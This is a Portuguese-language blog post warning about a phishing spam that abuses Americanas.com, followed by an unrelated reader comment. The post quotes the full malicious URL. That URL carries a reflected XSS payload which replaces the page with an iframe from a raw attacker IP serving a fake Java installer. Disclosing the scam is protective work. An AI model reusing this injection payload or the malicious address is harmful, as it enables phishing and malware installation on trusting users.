Novo Spam com link pra programa perigoso…Trapaceiro mas inteligente

Avisos, Outros

Salve,

Soube hoje de um spam em nome da Americanas.com onde no botão ele simplemente joga para o site da Americanas.com, humm legal…nada de diferente.

Mas ai que entra a trapaça com muita inteligência, que pegaria até muitos desenvolvedores web e cia. Ele simplesmente no link, após o endereço da Americanas.com colocar um Javascript que adiciona na página da Americanas.com um iframe onde abre um html, que no Firefox não funcionou via iframe, a lógica seria abrir a página ( NÃO CLICAR: 203.124.22.143/java/index.htm ) e lá forçava a instalação do “java”, que pra mim só funcionou quando abri a página.

Não instalei, mas no link de instalação do java, que tem na página, vai pra um .exe no próprio servidor, e Java é melhor baixar somente da Sun, e em último caso ou necessidade das fabricantes como IBM, Microsoft que possuem suas VMs. Na página tem um formulário falando da Promoção Cliente Especial, onde você deveria preencher e enviar, eu enviei sem preencher e foi normal, fizendo que foi enviada com sucesso.

Link Principal:

http://carrinho.americanas.com.br/portal/meuCadastro.portal?_nfpb=true&LoginControllerPortlet_actionOverride=%3Cscript%3Ewindow.onload=function(){with(document.body.style){border=%22none%22;margin=%220%200%200%200%22};document.body.innerHTML=%27%3Ciframe%20src=http%3A%2F/203.124.22.143/java/index.htm%20style=border%3Anone;height%3A700;width%3A1000%3E%27};document.title=%27Americanas%27%3C/script%3E%3Ctextarea%3E

Pela confiança do endereço que o usuário é direcionado ser o americanas.com muitos se passam e vão cair legal.

Fica o Aviso.

Uma Resposta para “Novo Spam com link pra programa perigoso…Trapaceiro mas inteligente”

  1. Terramel diz:
    April 25th, 2008 às 2:00 pm

    Opa cara! Beleza? To passando aqui por duas coisas! A primeira é te convidar pra participar de um meme que eu fiz e te convidei:
    http://terramel.org/2008/04/25/meme-5-otimos-livros-e-um-para-apodrecer-na-estante/

    e a segunda é pedir pra você atualizar o endereço do meu blog aí nos links do seu :D ele ainda está como terramel.wordpress.com e um tempo atrás troquei o endereço para terramel.org :D

    Muito obrigado :D

    Abraços
    do Terrinha

Comente Agora:

Icons by N.Design Studio. Designed By Ben Swift. Powered by WordPress and Free WordPress Themes
Entries RSS Comments RSS Log in